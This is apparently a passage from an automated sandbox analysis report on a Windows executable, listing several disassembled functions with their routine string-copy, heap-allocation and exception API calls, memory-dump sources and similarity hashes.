                            • Opcode Fuzzy Hash: 3ffda6a63688f296269f07fab111577cad5f789607f3f6586ca1cb3f08bf55cc
                            • Instruction Fuzzy Hash: 64F015B45003028FCB249F75E848927BAFAAF84701328982EAC9AC3315EA74D840CB20
                            Function 004433D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 00431557
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 00431579
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 0043159B
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 004315FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00443422
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044344B
                            • lstrcpy.KERNEL32(00000000,?), ref: 00443471
                            • lstrcpy.KERNEL32(00000000,?), ref: 00443497
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: 6a682a8cadf0a05e4faf81d539afe6e7d9359248dc388133ca6c416784eb6bd5
                            • Instruction ID: 735dbf1da75ec1d56e4d4cf40b93c1793e7be7befe2ad1d8f677ec2cb5e2d5b1
                            • Opcode Fuzzy Hash: 6a682a8cadf0a05e4faf81d539afe6e7d9359248dc388133ca6c416784eb6bd5
                            • Instruction Fuzzy Hash: 1D12F070A012019FEB28CF19C554B26B7E5BF45B1AB29C0AED809DB3A1D77ADD42CF44
                            Function 00447C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00447C94
                            • std::_Xinvalid_argument.LIBCPMT ref: 00447CAF
                              • Part of subcall function 00447D40: std::_Xinvalid_argument.LIBCPMT ref: 00447D58
                              • Part of subcall function 00447D40: std::_Xinvalid_argument.LIBCPMT ref: 00447D76
                              • Part of subcall function 00447D40: std::_Xinvalid_argument.LIBCPMT ref: 00447D91
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: string too long
                            • API String ID: 909987262-2556327735
                            • Opcode ID: e251a7f52b1ac06d33dfc2bfd6244bb40da466f5713dcbcfbcfa5f7f89bf655f
                            • Instruction ID: 0761edff3ad8345584eeaf21e4a43c7d18ef356a3107f7e457941fedcd68af9c
                            • Opcode Fuzzy Hash: e251a7f52b1ac06d33dfc2bfd6244bb40da466f5713dcbcfbcfa5f7f89bf655f
                            • Instruction Fuzzy Hash: 5031A5B23086148BF734DE6CE8C096BF7E9EF91754B204A2BF5428B641D7759C4283AD
                            Function 00436EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,?), ref: 00436F74
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00436F7B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcess
                            • String ID: @
                            • API String ID: 1357844191-2766056989
                            • Opcode ID: 786cd172285618da3802a9c76dafcf7402dae45c44bc8d390d25e7c5ed598417
                            • Instruction ID: 4026ada9792b9f09c431aca7ac89e9e010f4a56a8855af47097d10fa3e911358
                            • Opcode Fuzzy Hash: 786cd172285618da3802a9c76dafcf7402dae45c44bc8d390d25e7c5ed598417
                            • Instruction Fuzzy Hash: 2B21A170600602ABEB208F20DC84BB773E8EB45704F44987DF946CB680E778E945C754
                            Function 00451570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 004515A1
                            • lstrcpy.KERNEL32(00000000,?), ref: 004515D9
                            • lstrcpy.KERNEL32(00000000,?), ref: 00451611
                            • lstrcpy.KERNEL32(00000000,?), ref: 00451649
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: 948a5dbfaedc3c64e3046d8b89451515de493ede1ad93097f78177387adb0153
                            • Instruction ID: 1b68d4d76e2740d62bc5b14c612208541f6621541eebf0ddd3a3e8545147b9c8
                            • Opcode Fuzzy Hash: 948a5dbfaedc3c64e3046d8b89451515de493ede1ad93097f78177387adb0153
                            • Instruction Fuzzy Hash: 572128B0601B029BD724EF3AC558B17B7F9AF48301F04591EE886C7B51EB78E805CBA4
                            Function 00431530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00431610: lstrcpy.KERNEL32(00000000), ref: 0043162D
                              • Part of subcall function 00431610: lstrcpy.KERNEL32(00000000,?), ref: 0043164F
                              • Part of subcall function 00431610: lstrcpy.KERNEL32(00000000,?), ref: 00431671
                              • Part of subcall function 00431610: lstrcpy.KERNEL32(00000000,?), ref: 00431693
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431557
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431579
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043159B
                            • lstrcpy.KERNEL32(00000000,?), ref: 004315FF
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: ddd0c53005e177201bed90291532f7b8a6752f8be77dbd6503f470d303878408
                            • Instruction ID: d47eab5fdd9beb9885e4416a1bb7869eccc7c47439deaa709d131a360e530cc2
                            • Opcode Fuzzy Hash: ddd0c53005e177201bed90291532f7b8a6752f8be77dbd6503f470d303878408
                            • Instruction Fuzzy Hash: 9831C5B4A01B02AFC724DF3AC588957BBE5BF49304B00592EE996C3B20DB74F811CB94
                            Function 00431610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 0043162D
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043164F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431671
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431693
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: c79fb67d782b793c60f66da0e8f735401bd0d96a9271f874b3fcb214f95fe5e4
                            • Instruction ID: c113a678ed3c4bfe285f1e5e98f26c465cd2d5960ad6a3d62f15e938ba532cbe
                            • Opcode Fuzzy Hash: c79fb67d782b793c60f66da0e8f735401bd0d96a9271f874b3fcb214f95fe5e4
                            • Instruction Fuzzy Hash: D81154B46117029BC7149F76D519927B7FCBF49301B08152EE886C3B60DB78E801CB54